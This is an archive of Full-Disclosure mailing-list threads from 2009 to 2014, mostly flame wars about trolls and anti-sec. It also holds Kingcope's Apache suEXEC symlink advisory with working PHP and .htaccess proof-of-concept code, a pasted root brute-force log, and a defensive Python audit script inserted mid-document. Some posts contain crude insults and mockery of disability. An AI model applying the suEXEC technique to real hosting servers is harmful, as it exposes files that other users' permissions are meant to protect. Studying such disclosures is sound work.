Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Ooh goodie, where and what happened to N3td3v, he used to crack me up :D :D

On 3/17/14, Mario Vilas mvi...@gmail.com wrote:

ROFL [image: Inline image 1]

On Mon, Mar 17, 2014 at 11:07 AM, T Imbrahim timbra...@techemail.com wrote:

What drugs are you on Pedro Ribeiro I wonder ...? I express my views, if you don't like don't watch them. You responses so far have only been assy speculations so don't tell me Im wrong , and please don't say thing like that. I don't know who the other people is, but what is true in security I support. Why you would Google my name ... ? Is the English language causing you ill effects?

--- ped...@gmail.com wrote:

From: Pedro Ribeiro ped...@gmail.com
To: timbra...@techemail.com
Cc: full-disclosure@lists.grok.org.uk, Michal Zalewski lcam...@coredump.cx, mvi...@gmail.com, gynv...@coldwind.pl
Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Date: Mon, 17 Mar 2014 09:24:08 +

On 16 Mar 2014 23:36, T Imbrahim timbra...@techemail.com wrote:

The thread read Google vulnerabilities with PoC. From my understanding it was a RFI vulnerability on YouTube, and I voiced my support that this is a vulnerability. I also explained a JSON Hijacking case as a follow up, and you said you didn't follow. So I am just saying that treating security that way, there are other parties like NSA who welcome them happily.

I think these guys - Alfred, Kirschbaum and Imbrahim are the OP's sock puppets. They are all first time posters from unusual free email providers jumping to defend the OP out of nowhere. If you search Google for their emails you only find references to this thread. They present similar (false and /or incorrect) arguments, talk about their extensive work experience, bash Google and its security team and send repeated emails with exactly the same text. This is turning into a madhouse... I hope this guy doesn't have access to a gun.

Regards
Pedro

-- There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google vulnerabilities with PoC
How the hell did you ever think Google will honor this? By now they could be fixing this issue, they hell don't care about you.

On 3/15/14, Georgi Guninski gunin...@guninski.com wrote:

Is it possible with the help of Godwin's law this discussion moves offlist?

-- guninski

On Thu, Mar 13, 2014 at 10:43:50AM +, Nicholas Lemonias. wrote:

Google vulnerabilities uncovered...
http://news.softpedia.com/news/Expert-Finds-File-Upload-Vulnerability-in-YouTube-Google-Denies-It-s-a-Security-Issue-431489.shtml

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
One thing u gotta remember most of the Admins who handle webservers in a network are also developers since most of the organizations will always need to cut on expenses, and as we know, most of the developers will just look into finishing work and making it work. So if something doesn't run due to httpd.conf, you will find these guys loosening server security, therefore opening holes to the infrastructure. Just my two cents

./Chucks

On 8/10/13, Kingcope isowarez.isowarez.isowa...@googlemail.com wrote:

Uhh Hit em with a little Ghetto Gospel So am i less holy Because i Puff a blunt and Drink a Beer with my homies? Theres no Need for you to fear me if you Take your Time and Hear me Maybe you can learn to cheer me. It aint about Black and white cause we Human !!! Lord can you Hear me speaaak!!
http://rapgenius.com/2pac-ghetto-gospel-lyrics

On 09.08.2013 at 16:33, Kingcope isowarez.isowarez.isowa...@googlemail.com wrote:

So the blackhat that Sits on ur Site and the site of ur company Since half a year will stop at the point Where its technically incorrect and wont escalate to root because it doesnt have to do Anything with suexec. Its an Old vuln so let it stay , better for us and soon our Data on your boxes. Time to Write a Real Root exploit and dont waste the Time with sysadmins that know how to set a flag in httpd.conf , apache devs included.

On 09.08.2013 at 14:29, Kingcope isowarez.isowarez.isowa...@googlemail.com wrote:

So what your Emails Tell me is better ignore this vulnerability. I dont Claim its a High severity Bug but if you Tell People to ignore it Because it isnt a vulnerability you are very much aiding the Chaos of insecurity in the Internet today. You Maybe have a Secure Setting but theres only you on the Planet. Attackers Look specifically for such Bugs to Open Servers. No Wonder we have compromises in a High Scale every Day due to this ignorance. My rant on that One.
On 07.08.2013 at 21:49, king cope isowarez.isowarez.isowa...@googlemail.com wrote:

Apache suEXEC privilege elevation / information disclosure

Discovered by Kingcope/Aug 2013

The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs.

With this bug an attacker who is able to run php or cgi code inside a web hosting environment and the environment is configured to use suEXEC as a protection mechanism, he/she is able to read any file and directory on the file-system of the UNIX/Linux system with the user and group id of the apache web server.

Normally php and cgi scripts are not allowed to read files with the apache user-id inside a suEXEC configured environment.

Take for example this apache owned file and the php script that follows.

    $ ls -la /etc/testapache
    -rw------- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache

only user www-data should be able to read this file.

    $ cat test.php
    <?php
    system("id; cat /etc/testapache");
    ?>

When calling the php file using a webbrowser it will show...

    uid=1002(example) gid=1002(example) groups=1002(example)

because the php script is run through suEXEC. The script will not output the file requested because of a permissions error.

Now if we create a .htaccess file with the content...

    Options Indexes FollowSymLinks

and a php script with the content...

    <?php
    system("ln -sf / test99.php");
    symlink("/", "test99.php"); // try builtin function in case when
                                //system() is blocked
    ?>

in the same folder ..we can access the root filesystem with the apache uid,gid by requesting test99.php. The above php script will simply create a symbolic link to '/'.

A request to test99.php/etc/testapache done with a web browser shows..
voila! read with the apache uid/gid

The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case.

Version notes. Assumed is that all Apache versions are affected by this bug.

    apache2 -V
    Server version: Apache/2.2.22 (Debian)
    Server built: Mar 4 2013 21:32:32
    Server's Module Magic Number: 20051115:30
    Server loaded: APR 1.4.6, APR-Util 1.4.1
    Compiled using: APR 1.4.6, APR-Util 1.4.1
    Architecture: 32-bit
    Server MPM: Worker
    threaded: yes (fixed thread count)
    forked: yes (variable process count)
    Server compiled with
    -D APACHE_MPM_DIR=server/mpm/worker
    -D APR_HAS_SENDFILE
    -D APR_HAS_MMAP
    -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
    -D APR_USE_SYSVSEM_SERIALIZE
    -D
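
An audit for the pattern the advisory above describes, added here as an example and not part of the original post or of Apache's code: it walks a document root and reports `.htaccess` files that switch on `FollowSymLinks` and symlinks that leave the docroot or whose target has a different owner (the comparison Apache's `SymLinksIfOwnerMatch` option makes). The function names and the sample tree built under a temporary directory are constructed for illustration.

```python
"""Audit a vhost document root for the symlink pattern in the suEXEC advisory."""
import os
import tempfile


def htaccess_enables_follow(text):
    """True if an Options line turns on unconditional symlink following."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # Apache comments are whole lines
            continue
        tokens = line.split()
        if tokens[0].lower() != "options":
            continue
        for opt in tokens[1:]:
            # "+FollowSymLinks", "FollowSymLinks" and "All" enable it;
            # "-FollowSymLinks" and "SymLinksIfOwnerMatch" do not.
            if opt.lower().lstrip("+") in ("followsymlinks", "all"):
                return True
    return False


def audit_docroot(docroot):
    """Return sorted (kind, relative_path) findings for one document root."""
    root = os.path.realpath(docroot)
    findings = []
    # followlinks=False: symlinked directories are listed but never descended into.
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if os.path.islink(path):
                target = os.path.realpath(path)
                if os.path.commonpath([root, target]) != root:
                    findings.append(("symlink-escapes-docroot", rel))
                elif (os.path.exists(target)
                      and os.lstat(path).st_uid != os.stat(target).st_uid):
                    findings.append(("symlink-owner-mismatch", rel))
            elif name == ".htaccess":
                with open(path, "r", errors="replace") as fh:
                    if htaccess_enables_follow(fh.read()):
                        findings.append(("htaccess-follow-symlinks", rel))
    return sorted(findings)


def build_sample(base):
    """Constructed sample tree mirroring the advisory's .htaccess and test99.php."""
    docroot = os.path.join(base, "public_html")
    os.makedirs(os.path.join(docroot, "img"))
    with open(os.path.join(docroot, ".htaccess"), "w") as fh:
        fh.write("Options Indexes FollowSymLinks\n")
    with open(os.path.join(docroot, "index.php"), "w") as fh:
        fh.write("<?php echo 'ok'; ?>\n")
    # The link from the advisory: points at the filesystem root.
    os.symlink("/", os.path.join(docroot, "test99.php"))
    # A benign link that stays inside the docroot and keeps the same owner.
    os.symlink("../index.php", os.path.join(docroot, "img", "home.php"))
    return docroot


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        for kind, rel in audit_docroot(build_sample(base)):
            print(f"{kind:28s} {rel}")
```

A finding is a prompt to review what the vhost's `AllowOverride` setting lets `.htaccess` change.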
Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown
What happened to the link.

On 6/8/13, kai k...@rhynn.net wrote:

wget http://botslayer.ru/final_solution.txt

i've registered this domain just to save incompetent shitheads who blindly run any code which is supposed to fix security problem. why have you included the non-existent domain in your code? thanks for your interesting investigation anyway.

Cheers, Kai

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] LulzSec EXPOSED!
I think its just a bruteforce. On 6/6/11, Andreas Bogk andr...@andreas.org wrote: Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011: Lulzsec == pwnt I've seen the log you pasted to pastebin. Is this: * A timing attack on ssh passwords over the net? * Fake, to distract us from your real 0day? Andreas Log: root@gibson:~# ./1337hax0r 204.188.219.88 -root Attempting too hax0r root password on 204.188.219.88 h,VhXzavMm 3xLl1-_\wC ffsakTgyc~H ZZrz,pJrgB b{4Bv_Y$$Z6 XDh;vDU-;3 FB-hvg%g_'t }qHNvkS'g RNBKvUi5yO| z`(}v1^u *V4?vh9#^f2 /R*9vfhZ# 9P65vjKhh.N \rfsv~PhNDz Bfpv|uhGpy J%kvf]hGf0 sY0v{2hf7p 9dev%Qh6_v *Tbv7?h.** }:lkvV^hN2U ;5Xv'Sh#}_ MOqpvi_hg+# Md9/viVhu7 M(%rvomhb' MI5v_shEVe M=@?vl.hZge MPk5v:WhUTe M=3vvrzh7Te M'?v]sh`Te M/Z,vI1h`Te M.9vO$hTTe Ms!(vY;hpTe MA)SvYLhnTe M7eCv@Lh0Te MkeCvFLh$Te M'eCv?LhaTe MeCvLLh|Te M*eCv5Lh\Te MmeCvcLhCTe MTeCvLhrTe M,eCv1LhYTe MEeCv}LhHTe M_eCvSLhnTe MPeCvSLh+Te M[eCvSLh,Te MOeCvSLhTe M7eCvSLhTe MGeCvSLhdTe M$eCvSLhkTe MCeCvSLhkTe MLeCvSLhkTe M=eCvSLhkTe M-eCvSLhkTe MweCvSLhkTe M=eCvSLhkTe M3eCvSLhkTe M6eCvSLhkTe MreCvSLhkTe M6eCvSLhkTe MFeCvSLhkTe MSeCvSLhkTe M8eCvSLhkTe Password hax0rd! root password: M8eCvSLhkTe root@gibson:~# ssh 204.188.219.88 root@204.188.219.88's password: root@xyz:~# hostname; id; w xyz uid=0(root) gid=0(root) groups=0(root) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester jgichuki at inbox d0t com {FORUM}http://lists.my.co.ke/pipermail/security/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 10 OpenBSD facts and is timeline of Backdoor
God, i cant even understand half the shit he is saying? English so upside down!

On 12/17/10, Christian Sciberras uuf6...@gmail.com wrote:

HAHAHAHAHAH!! GOD so are funny you!11

2010/12/16 musnt live musntl...@gmail.com

OpenBSD is Backdoor facts

1) Is we look to monkey.org posting, we is see Theo make is change to CVS for this portion of code is work on by Jason (name is mentioned by Perry)

2) Is we look at timeframe for Backdoor, is code be in 2.5 or 2.6, musn't live theorize 2.6
* 2.6: December 1, 1999 -
* Based on the original SSH suite and developed further by the OpenBSD team, 2.6 saw the first release of OpenSSH, which is now available standard on most Unix-like operating systems and is the most widely used SSH suite.
http://en.wikipedia.org/wiki/Timeline_of_OpenBSD

3) Is Theo not deny there is no backdoor, only say he is unaware (musn't live is unaware of exact time right now, is know time exist!)
a) Theo and OpenBSD not audit anything (trusting trust)
b) pre-emptive is wasn't me from Theo in event truth comes later Hey I is Theo I do right thing and strike err.. Disclose first! I not know!
c) all of is the above

4) While is everyone claim Perry прил, is no one else outside of Jason on OpenBSD is say: Perry is lying even former developers is stay quiet to protect the DARPA/FBI innocent

5) Is possible at people by mentioned in named by Perry, go to Canada to hack code and plant is backdoor

6) Old code (2.6) is sayanoruski. Is good luck find mirror. CVS is controlled by those is accused, quick move and we is have: See is no backdoor in this backdoor!

7) OpenBSD is the most secure backdoored on the planet

8) Is need slogan change: Only two remote holes in the default install, in a heck of a long time! (Is besides backdoor!!!)

9) We is all peons to Theo and we is cannot figure out truth as we is brains are so too small

10) Claims surpass is Microsoft NSA theory

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
waoh. very funny.

On 3/21/10, Andrew Walberg andrew.walb...@rocketmail.com wrote:

Hello. Everyone here has learned there lesson and has suffered because Andrew Wallace (n3td3v) has been banned. n3td3v is a multi-national organization of national security experts who have been driven to the underground thanks to John Cartwright. Since then, mossad has been able to infiltrate and cause significant global problems. n3td3v was offended and furious. He doesn't have 0day. He doesn't hack. Unban Andrew Wallace and let the information be free. If you unban him we will finally have justice in this world for n3td3v and his 5000 employees. Everyone at our office is waiting for your answer, John Cartwright

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
Especially the ones working for governments, the surveillance and espionage etc, scares more

On 1/4/10, netinfinity netinfinity.security...@gmail.com wrote:

I couldn't agree more with Adriel.

-- netinfinity

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
One of the amazing thing about these hackers calling them antisec didn't have real hardening on their servers. Most of their servers had direct public ip on their Interfaces and even their user management was crappy. I remember when i heard of antisec i thot these guys were real gurus with more than 10 years of experience, but after the fake sshd and fake attacks, and DDOS that meant nothing and now all is lulz, i cant help but rofl.

./Chuks

On 1/2/10, Jeff Blaum jblau...@gmail.com wrote:

It still does not change the fact that you (Glafkos) are a cock, and that astalavista is (and was) always a shit stain of a website.

J

On Thu, Dec 31, 2009 at 9:38 AM, Glafkos Charalambous i...@infosec.org.uk wrote:

-=* LULZ! *=-

anti-sec.com

-=* RAWR! *=-

http://www.anti-sec.com
http://pastebin.com/f12f6f9c0
http://pastebin.mozilla.org/694145
http://pastebin.ca/1733192

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] The Cyber War Conspiracy
K, full-disclos...@safe-mail.net or whoever you are, i think you are watching too much of 24 or even Spooks. Please quit and relax abit!!!

./Chuks

On 12/5/09, Paul Schmehl pschmehl_li...@tx.rr.com wrote:

--On December 4, 2009 10:44:20 PM -0600 valdis.kletni...@vt.edu wrote:

On Fri, 04 Dec 2009 14:32:34 PST, Sam Haldorf said:

n3td3v is probably ureleet, full-censorship, full-disclosure, antisec, jdl and valdis.

He might be those other dudes, but he's not me. If I was going to pose as a troll, I'd pose as a more clueful troll - trying to think that cluelessly makes my brain hurt. On the other hand, nobody's ever seen me and Paul Schmehl at the same place at the same time... I wonder why... :)

Because we have no travel money. :-)

Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer.
** WARNING: Check the headers before replying

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] n3td3v mentioned in a book?
Maybe its not a Ban, maybe its a burn notice!

On 10/4/09, full-censors...@hushmail.com full-censors...@hushmail.com wrote:

if this guy is mentioned in a book and we banned him?

http://f0rb1dd3n.com/links.php

i'm calling for a serious review of whats going on with the ban list.

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers
Thank you for this my.hndl. There are some issues i have been having and seems your methodology may work on Fedora and others OSs. Thankx

./Chuks

On 9/30/09, maxigas maxi...@anargeek.net wrote:

From: bo...@civ.zcu.cz bo...@civ.zcu.cz
Subject: Re: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers
Date: Wed, 30 Sep 2009 00:03:51 +0200

All standard users have read access to /var/log/auth, so if root they shouldn't, at least on my default debian they don't ...

On my default Ubuntu, users in adm group have read access to the authentication log file:

    m...@machine: ls -l /var/log/auth.log
    -rw-r----- 1 syslog adm 46774 2009-09-30 01:10 /var/log/auth.log

-- maxigas // villanypásztor / kiberpunk / web shepherd //
-= Important communication disclaimer: by replying to my emails you are disclaiming all your disclaimers. =-

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] n3td3v's Twitter account hacked
Just saw that. Thot were new trolls by n3td3v pouring all the way to twitter.

On 9/19/09, The Security Community thesecuritycommun...@gmail.com wrote:

Someone evidently hacked into n3td3v's Twitter account and is spewing nonsense.

http://twitter.com/n3td3v

Maybe it's some sort of botnet CC account now, I dunno.

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] Moar iProphet questions
Now, i think this is really wrong. There is no need of making fun of someone who is disabled by attacking n3td3v.

On 8/29/09, Gary McKinnon john.wall...@hush.com wrote:

iProphet (weev) Questions

Sorry for being repetitive. FD is mostly hoarsechit and fucin around anyway (not that you do ANY of that). My name is Gary McKinnon, I'm the nerd that hacked into the Pentagon. I'm autistic so I may have difficulty communicating or understanding you. HELLO? Can you hear me? I CAN'T SEE THE SCREEN. LET ME TRY TO TYPE SOME QUEStions 8==^H^H^H^H^HD

1.) Do you have HIV?
2.) Have you ever anointed anyone with your IRL Virus?
3.) Do you think that you could be prosecuted for hacking if you give people your IRL badware?
4.) Do the woman you give HIV to go to heaven?
5.) What does your computer screen look like? You run linux? Do you have an iProphet wallpaper?
6.) When will we be seeing new vlogcasts
7.) Do you plan on writing some subversive PDF's for us?
8.) Do you intend on making a documentary so it can go viral and cause a revolution?
9.) In your mind, what is your picture of an ideal world?

This post was by Gary McKinnon [SOLO], elite autistic hacker.

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] http://secreview.blogspot.com -- end of life
Please bring it back. It was a nice blog, or send me an archive of the ut. Thankx

./Chuks

On 8/13/09, secrev...@hushmail.me secrev...@hushmail.me wrote:

Hi Everyone,

We received a lot of emails from different people asking us what happened to our blog at http://secreview.blogspot.com. What happened is we decided to shut down operations because we don't have time to keep doing reviews. We also don't have time to redo reviews which is needed to keep the reviews fair. We all have full time jobs and recently have been traveling a lot.

We started secreview because we wanted to expose security companies for what they really were. But now because we can't do it any more we don't think its fair that only some companies get reviewed and others don't. So we deleted the blog (but we have 90 days to bring it back if people want it). If we do bring it back, we will probably not do any more reviews and we will leave it up just because.

Do people want the blog to be recovered or do they want us to keep it dead?

-- Secreview

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Redspin, Inc. (C+)
Just read this. What happened to your blog, http://secreview.blogspot.com? On 8/11/09, secreview secrev...@hushmail.com wrote: We received 22 requests from different people to perform a review of Redspin! Their website can be found at http://www.redspin.com. We haven’t done a review of anyone in quite a while, the last review that we did was for Pivot Point Security who got an A (we still recommend them). We apologize for this long delay but we have been very busy traveling (yes we still have jobs doing consulting work sometimes). As you can see from the comments that we received in other posts we have a lot of catch up work to do, but to be honest we are not sure that we will be able to do it. This review might be our final and last review depending on how much more travel we have. (We have lives, some of us have families, and we can’t keep doing this for free even though we feel that this is a great service). We did a lot of research on Redspin and we managed to get a copy of two reports that they did for two different customers. We won’t share those reports with you because that would be unethical, don’t ask. Redspin claims that it is a “pure penetration testing firm”. What they mean by “pure penetration testing” is that they do not resell third party software or hardware. They also say that “don't find problems on your network so that [they] can make more money; [their] penetration testing services reveal vulnerabilities, [that] will help you become more secure.” We verified their claim with our own research. Redspin will not try to sell you software or hardware… but they might try to sell you software as a service. (see their www.jetmetric.com website). Redspin takes it a step further and is brutally honest about their methodology for delivering penetration-testing services. They openly admit that their services rely on automated vulnerability scanners (Nessus) and are enhanced by manual testing. 
In fact, Redspin says that automated scanners “can miss about 40% of the security risk so they alone do not adequately assess risk. Furthermore, about half of the findings from a vulnerability scan are false positives”. Any security company that relies on automated scanners can weed out false positives, but doing that doesn’t really increase the depth and accuracy of testing. A false positive, also known as an error of the first kind, or a Type I Error, is the rejection of a null hypothesis when it is in fact true. In more simple terms, this is the error of observing a difference when in fact there isn’t one. Identifying false positives is fairly easily done, as it only requires inspecting the results produced by a scanner. But what about False Negatives? A False Negative, also called a Type II Error, or an error of the second kind, is the error of failing to reject a null hypothesis when it is in fact not true. More simply, a False Negative is the error of failing to observe a difference when in truth there is one. So, if an automated vulnerability scanner tests a vulnerable service (a known vulnerability) but the scanner doesn’t detect the vulnerability then the vulnerability is excluded from the report. If this is the case then Redspin’s methodology will break down because there will be no result in the report for Redspin to manually test. That vulnerability will fly under the Redspin radar but might not be missed by a hacker. So how many vulnerabilities does Redspin miss? It’s a question worth asking. Redspin does say that “vulnerability scanning is not suitable on its own as a complete or billable service offering, it does provides some value in the early reconnaissance phase of a more comprehensive External Network Security Assessment”. They have a typo in that sentence, but other than that, they are right. Vulnerability scanning does have a position in the industry and is a huge time saver, especially when testing large numbers of systems. 
Just don’t rely on one vulnerability scanner like Redspin does, use two or more like the OSSTMM proposes. Redspin says “manual analysis is at the heart of all of [their] assessments which not only gives you confidence that you have a complete view of your security risk, but provides tailored reporting and recommendations enabling simple work-arounds and cost-effective mitigation strategies for most security issues.” Based on our research Redspin’s “manual analysis” isn’t what we expected it to be. It is not based on vulnerability research and is strictly based on the inspection and verification of scanner output. What we can say is that their “manual analysis” doesn’t produce the highest quality reports that ever we’ve seen, but it does produce reports that are higher than average quality. The Redspin reports have very few, if any, False Positives but will contain more False Negatives than a report that is centered on solid (vulnerability) research. One thing that Redspin does
Re: [Full-disclosure] AntiSec PHHEER #1 (anti...@hushmail.com)
i thought the same thing. This guy shud get a life!!!

On 8/9/09, Zloss aza...@gmail.com wrote:

So what the heck are you doing dumbass ?

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] anti-sec: OpenSSH = 5.2 zero day exploit code - 48 hours until it is publicly released!
hahaha, now u r releasing it I thought u guyz dont release or disclose vulnerabilities.

./Chuks

On 7/20/09, Ant-Sec Movement anti.sec.movem...@gmail.com wrote:

Dear Reader,

In 48 hours, the anti-sec movement will publicly unveil working exploit code and full details for the zero-day OpenSSH vulnerability we discovered. It will be posted to the Full-Disclosure security list.

Soon, the very foundations of Information Technology and Information Security will be unearthed as millions upon million of systems running ANY version of OpenSSH are compromised by wave after wave of script-kiddie and malicious hacker.

Within 10 hours of the initial release of the OpenSSH 0-day exploit code, anti-sec will be unleashing powerful computer worm source code with the ability to automatically find and compromise systems running any and all versions of OpenSSH.

This is an attack against all White Hat Hackers who think that running a Penetration Test simply searching for known vulnerabilities is all they have to do in order to receive their payment. Anti-sec will savor the moment when White Hat Hackers are made to look like fools in the eyes of their clients.

Sincerely,
-anti-sec

--
Gichuki John Ndirangu,
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
Hehehe, netdev? For real?. He is the Anti-sec. I think thats wrong

On Thu, Jul 16, 2009 at 1:35 PM, Benjamin Cance cance.consult...@gmail.com wrote:

now we know who antisec are/is, i'm going to bed

Charles Majola wrote:

HAH! I knew it

On Thu, Jul 16, 2009 at 2:54 PM, Ureleet urel...@gmail.com wrote:

careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. careful who you talk 2, he has many names.

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/